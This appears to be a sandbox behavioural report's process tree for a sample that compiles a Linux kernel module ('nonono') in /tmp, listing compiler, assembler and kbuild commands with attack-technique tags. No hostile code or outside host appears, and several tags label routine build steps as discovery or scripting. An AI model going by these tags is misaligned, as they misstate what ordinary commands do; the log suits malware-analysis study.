/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1831/tmp /tmp/cciCJAPV.s5⤵PID:1835
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1831/tmp /tmp/cciCJAPV.s5⤵PID:1835
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18314⤵PID:1836
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fmacro-prefix-map=./=\"; else echo \"\"; fi"3⤵PID:1837
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18374⤵
- Reads runtime system information
PID:1838
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-fmacro-prefix-map=./=" -c -x c /dev/null -o /tmp/a/.tmp_1837/tmp4⤵
- Writes file to tmp directory
PID:1839 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1837/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack "-fmacro-prefix-map=./=" -fstack-protector-strong -o /tmp/cc50uC7j.s5⤵
- Writes file to tmp directory
PID:1840
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1837/tmp /tmp/cc50uC7j.s5⤵PID:1841
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1837/tmp /tmp/cc50uC7j.s5⤵PID:1841
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1837/tmp /tmp/cc50uC7j.s5⤵PID:1841
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1837/tmp /tmp/cc50uC7j.s5⤵
- Writes file to tmp directory
PID:1841
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18374⤵PID:1842
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wpacked-not-aligned -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-packed-not-aligned\"; else echo \"\"; fi"3⤵PID:1843
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18434⤵PID:1844
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ "-fmacro-prefix-map=./=" -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wpacked-not-aligned -c -x c /dev/null -o /tmp/a/.tmp_1843/tmp4⤵
- Writes file to tmp directory
PID:1845 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1843/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wpacked-not-aligned "-std=gnu90" -p "-fmacro-prefix-map=./=" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack -fstack-protector-strong -o /tmp/cc7tFPXV.s5⤵
- Writes file to tmp directory
PID:1846
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1843/tmp /tmp/cc7tFPXV.s5⤵PID:1847
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1843/tmp /tmp/cc7tFPXV.s5⤵PID:1847
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1843/tmp /tmp/cc7tFPXV.s5⤵PID:1847
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1843/tmp /tmp/cc7tFPXV.s5⤵PID:1847
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18434⤵PID:1848
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( ld -m elf_x86_64 -z noexecstack --no-warn-rwx-segments -v) >/dev/null 2>&1; then echo \"--no-warn-rwx-segments\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1849 -
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18494⤵PID:1850
-
-
/usr/bin/ldld -m elf_x86_64 -z noexecstack --no-warn-rwx-segments -v4⤵PID:1851
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18494⤵PID:1852
-
-
-
/bin/sh/bin/sh -c "LC_ALL=C gcc --version 2>/dev/null | head -n 1"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1853 -
/usr/bin/headhead -n 14⤵PID:1855
-
-
/usr/bin/gccgcc --version4⤵PID:1854
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1856 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1857
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1858 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1859
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1861 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1862
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1863 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1864
-
-
-
/bin/sh/bin/sh -c "test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \\ echo >&2; \\ echo >&2 \" ERROR: Kernel configuration is invalid.\"; \\ echo >&2 \" include/generated/autoconf.h or include/config/auto.conf are missing.\";\\ echo >&2 \" Run 'make oldconfig && make prepare' on kernel src to fix it.\"; \\ echo >&2 ; \\ /bin/false)"3⤵PID:1865
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1866 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1867
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1868 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1869
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1871 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1872
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1873 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1874
-
-
-
/bin/sh/bin/sh -c "if [ \"gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\" != \"gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\" ]; then \\ echo >&2 \"warning: the compiler differs from the one used to build the kernel\"; \\ echo >&2 \" The kernel was built by: \"\"gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\"; \\ echo >&2 \" You are using: gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\"; \\ fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1875
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1876 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1877
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1878 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1879
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1881 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1882
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1883 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1884
-
-
-
/usr/bin/makemake -f ./scripts/Makefile.build "obj=/tmp/a" "single-build=" "need-builtin=1" "need-modorder=1"3⤵
- System Network Configuration Discovery
PID:1885 -
/usr/bin/mkdirmkdir -p /tmp/a4⤵PID:1886
-
-
/bin/sh/bin/sh -c "set -e; echo ' CC [M] /tmp/a/nonono.o'; trap 'rm -f /tmp/a/nonono.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.o; trap - PIPE; kill -s PIPE \$\$' PIPE; gcc -Wall -Wp,-MMD,/tmp/a/.nonono.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\"nonono\"' -DKBUILD_MODNAME='\"nonono\"' -D__KBUILD_MODNAME=kmod_nonono -c -o /tmp/a/nonono.o /tmp/a/nonono.c; scripts/basic/fixdep /tmp/a/.nonono.o.d /tmp/a/nonono.o 'gcc -Wall -Wp,-MMD,/tmp/a/.nonono.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\\''\"nonono\"'\\'' -DKBUILD_MODNAME='\\''\"nonono\"'\\'' -D__KBUILD_MODNAME=kmod_nonono -c -o /tmp/a/nonono.o /tmp/a/nonono.c' > /tmp/a/.nonono.o.cmd; rm -f /tmp/a/.nonono.o.d"4⤵
- Writes file to tmp directory
PID:1887 -
/usr/bin/gccgcc -Wall "-Wp,-MMD,/tmp/a/.nonono.o.d" -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ "-fmacro-prefix-map=./=" -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wno-packed-not-aligned "-fsanitize=bounds" "-fsanitize=shift" "-fsanitize=bool" "-fsanitize=enum" -DMODULE "-DKBUILD_BASENAME=\"nonono\"" "-DKBUILD_MODNAME=\"nonono\"" "-D__KBUILD_MODNAME=kmod_nonono" -c -o /tmp/a/nonono.o /tmp/a/nonono.c5⤵
- Writes file to tmp directory
PID:1888 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -nostdinc -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY -D MODULE -D "KBUILD_BASENAME=\"nonono\"" -D "KBUILD_MODNAME=\"nonono\"" -D "__KBUILD_MODNAME=kmod_nonono" -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -include ./include/linux/compiler_types.h -MMD /tmp/a/.nonono.o.d /tmp/a/nonono.c -quiet -dumpdir /tmp/a/ -dumpbase nonono.c -dumpbase-ext .c -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wno-packed-not-aligned "-std=gnu90" -p "-fmacro-prefix-map=./=" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack "-fsanitize=bounds" "-fsanitize=shift" "-fsanitize=bool" "-fsanitize=enum" -fstack-protector-strong -o /tmp/ccmjDalP.s6⤵
- Writes file to tmp directory
PID:1889
-
-
/usr/local/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/nonono.o /tmp/ccmjDalP.s6⤵PID:1890
-
-
/usr/local/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/nonono.o /tmp/ccmjDalP.s6⤵PID:1890
-
-
